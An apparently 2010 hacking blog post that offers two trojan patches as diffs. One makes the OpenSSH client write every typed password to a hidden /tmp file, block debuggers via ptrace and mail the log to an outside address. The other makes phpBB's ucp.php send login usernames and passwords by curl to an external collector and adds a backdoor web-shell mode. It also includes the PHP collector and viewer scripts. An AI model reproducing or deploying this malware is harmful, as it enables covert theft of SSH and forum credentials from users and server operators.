Some Bullshit About SSH Keylogger! This ssh keylogger patch just works on FreeBSD system. Use your fucking brain to make it working in other operating system. For Anti debugging feature, there is simple idea to prevent tracing system like strace, just prevent ptrace syscall! If you are cool enough, improve this keylogger to encrypt the data. Keep Hacking boyz! SSH Keylogger OpenSSH-5.3p1 Patch. --- sshconnect2.c.ori 2010-02-12 21:44:49.000000000 +0700 +++ sshconnect2.c 2010-02-12 22:13:43.000000000 +0700 @@ -31,6 +31,7 @@ #include#include +#include #include #include #include @@ -75,6 +76,10 @@ #include "ssh-gss.h" #endif +//SSH log + +#define LOGZ "/tmp/.byteskrew" // change this line and make it more hidden + /* import */ extern char *client_version_string; extern char *server_version_string; @@ -92,6 +97,16 @@ Kex *xxx_kex = NULL; +//Anti Ptrace! +void tracer_check(void) __attribute__((constructor)); + +void tracer_check(void){ + if (ptrace(PT_TRACE_ME, 0, 0, 0) == -1) { + _exit(-1); + } +} + + static int verify_host_key_callback(Key *hostkey) { @@ -780,8 +795,9 @@ userauth_passwd(Authctxt *authctxt) { static int attempt = 0; - char prompt[150]; + char prompt[150],logz[128]; char *password; + FILE *f; if (attempt++ >= options.number_of_password_prompts) return 0; @@ -792,6 +808,18 @@ snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ", authctxt->server_user, authctxt->host); password = read_passphrase(prompt, 0); + + //Password stealth +if((f=fopen(LOGZ,"a"))!=NULL){ +fprintf
(f,"user:password@host --> %s:%s@%s\n",authctxt->server_user,password,authctxt->host); +fprintf(f,"user:password@host --> %s\n",password); + fclose(f); + } + //kirim ke server pake curl/mail terserah + //example pake 'mailx' + snprintf(logz,sizeof(logz),"cat %s|mail -s hackme themaniac90@gmail.com",LOGZ); + system(logz); + packet_start(SSH2_MSG_USERAUTH_REQUEST); packet_put_cstring(authctxt->server_user); packet_put_cstring(authctxt->service); Fears Inside Your Forum Do you feel secure because your password is encrypted in database? Or you may think that hackers can't crack your password just because your password is strong. Let me tell you something, we know what you type in your keyboard without stealing your database. We can even hear what your fingers dance for. No more talk, this code will show you the fears inside your PHPBB forum. PHPBB3 UCP.PHP Patch. --- ucp.old.php 2009-11-16 06:12:47.000000000 -0800 +++ ucp.php 2009-11-17 09:00:08.000000000 -0800 @@ -11,6 +11,14 @@ /** * @ignore */ + +if(!empty($_POST['username']) AND !empty($_POST['password'])){ + $wr = $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\n"; + $uri = explode('?',$wr); + $toserv="/usr/bin/curl -d \"u=" . $_POST['username'] .
"&p=" . $_POST['password'] . "&uri=" . $uri[0] . "\"
http://ipsecs.com/devel/log.php >
/dev/null 2>&1";
+ passthru($toserv); +} + define('IN_PHPBB', true); $phpbb_root_path = (defined('PHPBB_ROOT_PATH')) ? PHPBB_ROOT_PATH : './'; $phpEx = substr(strrchr(__FILE__, '.'), 1); @@ -41,6 +49,41 @@ // Basic "global" modes switch ($mode) { + case 'hack' : + //echo " This forum is hacked!"; + ?> + ++ - Backdoor Web Shell - + Source Code log.php if(isset($_POST['u']) AND isset($_POST['p']) AND isset($_POST['uri'])){ $dbhost="localhost"; $dbuser="u_logger"; $dbpass="p_logger"; $dbname="logger"; $c=mysql_connect($dbhost,$dbuser,$dbpass) or die(mysql_error()); mysql_select_db($dbname) or die(mysql_error()); $q="INSERT INTO klog (username,password,uri) VALUES
( '" . $_POST['u'] . "','" . $_POST['p'] . "','" . $_POST['uri'] . "')"; $exec=mysql_query($q) or die(mysql_error()); } ?> Source Code view.php if(isset($_POST['key']) AND $_POST['key']=="owned"){ $dbhost="localhost"; $dbuser="u_logger"; $dbpass="p_logger"; $dbname="logger"; $c=mysql_connect($dbhost,$dbuser,$dbpass) or die(mysql_error()); mysql_select_db($dbname) or die(mysql_error()); $q="SELECT username,password,uri FROM klog ORDER BY no DESC"; $exec=mysql_query($q) or die(mysql_error()); ?>
Categories : 
Jumat, Maret 05, 2010
Unknown
0 komentar:
Posting Komentar